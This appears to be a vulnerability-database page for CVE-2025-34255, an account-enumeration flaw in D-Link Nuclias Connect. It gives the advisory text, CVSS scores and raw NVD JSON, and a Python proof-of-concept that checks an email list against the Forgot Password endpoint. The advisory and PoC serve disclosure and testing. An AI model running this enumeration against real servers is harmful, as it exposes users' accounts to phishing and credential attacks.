Security Vulnerability Report
CVE-2025-34255 CVSS 5.3 MEDIUM

CVE-2025-34255

Published: 2025-10-16 19:15:33
Last Modified: 2025-10-30 16:06:52

Description

D-Link Nuclias Connect firmware versions <= 1.3.1.4 contain an observable response discrepancy vulnerability. The application's 'Forgot Password' endpoint returns distinct JSON responses depending on whether the supplied email address is associated with an existing account. Because the responses differ in the `data.exist` boolean value, an unauthenticated remote attacker can enumerate valid email addresses/accounts on the server. NOTE: D-Link states that a fix is under development.

CVSS Details

CVSS Score (v3.1 base; the raw JSON below also carries a CVSS 4.0 base score of 6.9 from a secondary source)
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:dlink:nuclias_connect:*:*:*:*:*:*:*:* - VULNERABLE
D-Link Nuclias Connect firmware <= 1.3.1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
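#!/usr/bin/env python3
"""CVE-2025-34255 - D-Link Nuclias Connect account enumeration PoC.

The 'Forgot Password' endpoint of affected builds (<= 1.3.1.4) answers with a
JSON body whose ``data.exist`` boolean differs depending on whether the
submitted e-mail belongs to an account (CWE-204, observable response
discrepancy). This script reads that one field to tell the two cases apart.

Reading the output as a defender:
  * An endpoint that returns the same body for known and unknown addresses
    gives this script nothing to read; every probe is then reported as
    "[?] Error" (indeterminate), never as "[-] Invalid".
  * Server-side, a run looks like a sequence of unauthenticated POSTs to the
    forgot-password route over one connection, each carrying a different
    e-mail value.

Usage: pass the base URL as the first argument to override TARGET_URL.
"""
import requests
import sys
import json

TARGET_URL = "https://target-nuclias-connect.example.com"
# The advisory text does not name the route; this path is the PoC author's
# placeholder and has to match the deployment under test.
FORGOT_PASSWORD_ENDPOINT = "/api/forgot-password"  # Adjust path as needed


def check_email_exists(session, email):
    """Send one Forgot Password request and read ``data.exist`` from the reply.

    Args:
        session: object with a ``post(url, json=..., headers=..., timeout=...)``
            method, normally a ``requests.Session``.
        email: address to submit.

    Returns:
        True or False when the JSON reply contains a boolean ``data.exist``;
        None when the request fails, the body is not JSON, or the field is
        missing or not a boolean. Returning None (instead of False) for a
        missing field keeps a non-leaking endpoint or a wrong route from being
        reported as "account does not exist".
    """
    # Tolerate a base URL given with a trailing slash.
    url = f"{TARGET_URL.rstrip('/')}{FORGOT_PASSWORD_ENDPOINT}"
    payload = {"email": email}
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0",
    }

    try:
        response = session.post(url, json=payload, headers=headers, timeout=10)
        body = response.json()
    except (requests.RequestException, ValueError) as e:
        # ValueError covers a reply that is not valid JSON.
        print(f"[ERROR] Request failed for {email}: {e}")
        return None

    # The discrepancy itself: 'data.exist' differs based on account existence.
    inner = body.get("data") if isinstance(body, dict) else None
    exist = inner.get("exist") if isinstance(inner, dict) else None
    if isinstance(exist, bool):
        return exist

    print(f"[ERROR] No boolean data.exist in response for {email}")
    return None


def enumerate_accounts(email_list):
    """Probe every address in *email_list* and return those reported as existing.

    Prints one line per address ("[+] VALID", "[-] Invalid" or "[?] Error")
    and a summary. All requests share a single ``requests.Session``.
    """
    session = requests.Session()
    valid_accounts = []
    indeterminate = 0

    print(f"[*] Starting enumeration against {TARGET_URL}")
    print(f"[*] Testing {len(email_list)} email addresses...\n")

    for email in email_list:
        exists = check_email_exists(session, email)
        if exists is True:
            print(f"[+] VALID: {email}")
            valid_accounts.append(email)
        elif exists is False:
            print(f"[-] Invalid: {email}")
        else:
            indeterminate += 1
            print(f"[?] Error: {email}")

    print(f"\n[*] Enumeration complete. Found {len(valid_accounts)} valid account(s).")
    if indeterminate:
        # All probes indeterminate usually means the field is not exposed
        # (or the route is wrong), not that the accounts are absent.
        print(f"[*] {indeterminate} probe(s) returned no usable data.exist value.")
    return valid_accounts


if __name__ == "__main__":
    # Sample list. The entries are identical because the page hosting this
    # listing obfuscated the original addresses; they are placeholders only.
    emails = [
        "[email protected]",
        "[email protected]",
        "[email protected]",
        "[email protected]",
    ]

    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]

    enumerate_accounts(emails)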

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34255", "sourceIdentifier": "[email protected]", "published": "2025-10-16T19:15:32.920", "lastModified": "2025-10-30T16:06:51.820", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "D-Link Nuclias Connect firmware versions <= 1.3.1.4 contain an observable response discrepancy vulnerability. The application's 'Forgot Password' endpoint returns distinct JSON responses depending on whether the supplied email address is associated with an existing account. Because the responses differ in the `data.exist` boolean value, an unauthenticated remote attacker can enumerate valid email addresses/accounts on the server. NOTE: D-Link states that a fix is under development."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", 
"modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-204"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dlink:nuclias_connect:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.3.1.4", "matchCriteriaId": "1DDE121F-E175-450D-A078-A7BF6F643415"}]}]}], "references": [{"url": "https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10472", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.dlink.com/en/for-business/nuclias/nuclias-connect", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/dlink-nuclias-connect-forgot-password-account-enumeration", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}